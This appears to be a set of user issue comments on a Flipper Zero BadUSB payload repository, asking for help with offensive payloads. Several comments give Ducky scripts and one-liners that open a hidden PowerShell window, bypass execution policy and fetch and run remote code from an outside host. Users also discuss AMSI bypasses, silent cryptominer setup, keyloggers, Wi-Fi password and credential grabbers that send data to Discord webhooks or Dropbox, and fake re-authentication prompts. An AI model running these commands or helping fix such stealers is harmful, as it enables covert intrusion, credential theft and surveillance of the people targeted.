seems like a lot of payloads are getting caught by AMSI. is it possible to have a "stage 0" where the script downloads your payload, applies an AMSI bypass and/or obfuscation, and then runs the payload? I've been trying to think of a way to do this non-deterministically so that no two executions would look the same but my knowledge of powershell isn't that good (yet lol).

hay can i use an extra usb flash drive to host ur powershell commands ? i would use flipper to run ducky and instead of iwr to dl from my dbox i could have ducky/flipper use a flash drive to host my eth minning script so i can set up all my home minners quickly and silently any ideas or input would be greatly appreciated thxz homie happy hackin.....

or can i convert the powershell script to ducky or base64 then to ducky an run that from flipper ? still tryin to get my head around everything

use the browser to navigate to https://fakeupdate.net/ and then f11 to full screen

GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
DELAY 500
ENTER

So these script also work on a rubber ducky USB so I was wondering if it was possible to run more at once I've tired to do
"GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/9nb | iex
ENTER
DELAY 500
GUI r
DELAY 500
STRING powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex
ENTER"
But only the last one works both of them run just fine but only the last one gets fully executed so I was wondering if it was possible to do a system where it waits for the first to get done then does the second

Hey Jakoby,

I haven't had the opportunity to build this yet but though this might come in handy for enumerating remote storage tools that may not be signed into.

# New Feature: Cloud Services Enumeration
try {
    $cloudServices = Get-WmiObject Win32_Process | Where-Object { $_.Name -match 'Dropbox|OneDrive|GoogleDrive' } | Select-Object Name
} catch {
    $cloudServices = "Error in detecting cloud services"
}

Response:

PS C:\Users\User> $cloudServices

Name
----
OneDrive.exe

Whenever I run the keylogger.txt it works fine it just pops up that it was detected, I was wondering how long it would take to fix.

Doesn't work with win 11 tested on win 10 worked fine, also sorry I cant give an error message

Edit: tamperd and fixed it

Honestly have no idea how to use the Discord or Dropbox required txt files. it just won't work even with the key and the webhook

Hey Jakoby,

first of all thanks for the nice work and keep it up.

Second I got a problem with the script not uploading the file to my dropbox. Found your Youtube tutorial as well and that script with the same Access Key worked just fine, so I don't know what I'm missing.

Would be really happy if you could help me.

Alle the best.

Max

hi I seen there is a bad usb script called we found you. I'm unsure how this script operates though, surely you already know where the person is if youve gained physical access to their PC with a bad usb, so why would you need a location ping? I'm just genuinely unsure how this is utilised, any info would be great help.

hope to hear from you soon,
thanks in advance.

i was going to prank my freinds but it ran the code yet nothing happened can some one please help thank you

when I downloaded it, and did all the steps its said, "this file is too bi, still want to install it?" and i clicked yes then it took a while to download and then all my other apps said they were out of date and i couldn't open them so i removed the file that was 2MILLION+ GIGS but then i had to update all my apps and it worked again. Please help me with this.

I tried a adv-recon on a windows 10 pc that didn't have a WiFi card and wasn't connected using lan. Does it work without internet or does the computer need internet?

Hello Jakoby, and any users reading this.

I'd like to bring up this issue to let people know that you can get banned from using the discord webhook.

While i was testing it out on a VM, and was exfiltrating data from the VM to my discord server, i got a suspension issued not 6 hours later for "Hacking and malicious activity on discord".

Id like people to know about this, so they can be more careful about using the discord webhook

Hi Guys,

The Wifi-Grapper payload seems to work fine but when i receive the file on my discord it is empty.

Any idea ?

Thanks.

Hi,

I'm trying to run the rickroll payload. I get a window (powershell video player) but its empty, the video is not showing up. I checked the code but I don't know the problem. I see the mp4 video is downloaded in my temp folder. I did not change the code. I'm testing on Win10

Payload request: Flip-EvilGoose on Mac OS
Really need this please :)
Thanks if you can help! I will make a sweet donation if you make this @I-Am-Jakoby !

I’m new to flipper, so I don’t know what files I need. Do I just put the whole payload folder in my flipper?

Cannot get the voicelogger function to stop after saying exit.

Shish

Hi @I-Am-Jakoby I hope everything goes fine, you seem a bit AFK ⚠️ ?

EDIT: OW NO! I read about your fire! So sorry to hear this!

Your keylogger code seems a bit uh.. empty? https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/blob/main/Payloads/Flip-Keylogger/keylogger.ps1

You might want to peek into: https://github.com/CosmodiumCS/payloads/tree/main/rubberducky/DucKey-Logger

I believe that using clear and descriptive variable names can help new users better understand the purpose and function of the script.

Therefore i rewrote the script a bit:

powershell -UseBasicParsing -w h -NoP -NonI -Ep Bypass;$TempPath="$env:tmp";Invoke-WebRequest -Uri 'https://jakoby.lol/kiv' -OutFile "$TempPath\js.zip";Expand-Archive "$TempPath\js.zip" -DestinationPath $TempPath -Force;. "$TempPath\js\js.ps1"

I uploaded the file to flipper but it says wrong format or error at line one also I am new so I need help here.

Hello, how to active VoiceOver on iPhone for adding a shortcut ?

if the locale is not English , the output of the netsh wlan show profile name... command does not contain Key Content.

I have not figured out PS yet to find a reliable universal solution that leaves no traces in the system. Temporarily use several scripts for individual languages

possible solution:

[System.Threading.Thread]::CurrentThread.CurrentCulture = "en-US"
or
$env:LCID = "1033"

but ran into problems in Win 10

i think it would be nice to make a branch where none of the scripts rely on your shortlink in case it ever goes down

After you click ok on "re-auth your Microsoft account" it just says "credentials cannot be empty" and when you click ok it keeps popping up (tested on 2 windows 11 machines and 1 windows 10)

The user clicked: OK

You cannot call a method on a null-valued expression.

At line:61 char:5

• $cred.getnetworkcredential().password
  

• ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidOperation: (:) [], RuntimeException

  • FullyQualifiedErrorId : InvokeMethodOnNull

Hey there,

The dropbox access token is quite short-lived,
Is there a way to implement a refresh mechanism within the script ?

Cheers
CyD

Hello. I got an issue with the wifigrabber using a discord webhook. This is the error message:

{"message": "Invalid Webhook Token", "code": 50027}
PS C:\WINDOWS\system32\WindowsPowerShell\v1.0>

I already tried several times to change the webhook, and followed your instructions on the video, but somehow it doesn't work for me. Any idea ?

When i run the Rick Roll it runs and opens the powershell for a second and closes it again but when I try moving my mouse nothing happens. But if I manualy write it and hit enter it runs and opens powershell and when I move my mouse it starts.

I ran the script of Wallpaper-URL, from the collection of BadUSB and since that moment when I power on my computer the wallpaper changes to the picture of the URL always

Any idea to delete the script from wherever it is?

Thanks

wheni run it where do i find it.